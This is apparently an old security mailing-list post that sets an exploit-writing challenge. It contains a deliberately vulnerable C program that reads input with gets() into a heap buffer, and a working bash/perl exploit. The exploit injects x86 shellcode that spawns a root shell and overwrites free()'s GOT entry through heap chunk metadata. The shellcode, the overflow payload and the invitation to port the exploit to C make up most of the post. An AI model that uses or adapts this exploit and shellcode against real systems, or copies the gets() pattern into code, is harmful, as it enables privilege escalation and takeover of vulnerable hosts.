challenge

["fuzzy () bonbon net" <fuzzy () bonbon net>]

//----=[ Challenge ]=----//

Having been with the vulndev mailing list for a while now without 
seeing an exploit challenge, I thought I would offer one up for 
the masses... However this vulnerability is simple in design yet
appears to be difficult to exploit in C...

I have supplied a working bash script for the vuln, but it relies upon
the perl interpreter to supply the payload...

The challenge is to create a working exploit in C, and not perl, bash.


/* vuln.c */
/* familiar? ... */
#define LEN 256

int main(void) {

        char *buf1 = (char *)malloc(LEN);
        char *buf2 = (char *)malloc(LEN);

        printf("buf1: %p\n", buf1);
        printf("buf2: %p\n", buf2);
        gets(buf1);  
        free(buf2);
        free(buf1);
}

Notice the gets() function and the ordering of the free()'s..

The bash script using perl is as follows...

#!/bin/sh
# Thanks je
# No error checking
shellcode=`
printf "\xeb\x10AAAABBBBCCCCDDDD"
printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"
printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
printf "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
`
prog=./vuln
dest_addr=0x`objdump -R $prog | awk '$3 == "free" { print $1 }'`
code_addr=`perl -e
'printf("0x%08x",0xbfffffff-5-length("'$prog'")-length("'$shellcode'"))'`

echo "Shell dropped"
(perl -e 'print "A"x256 . pack('l', 0) . pack('l', 256+8) .
pack('l','$dest_addr'-12). pack('l', '$code_addr') ."\n"'; cat)| \
env - shellcode=$shellcode \
./vuln

exit 0

Hopefully I shall get responses to this challenge,...

Regards...

//-----=[ EOF ]=-----//


--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web.com/ .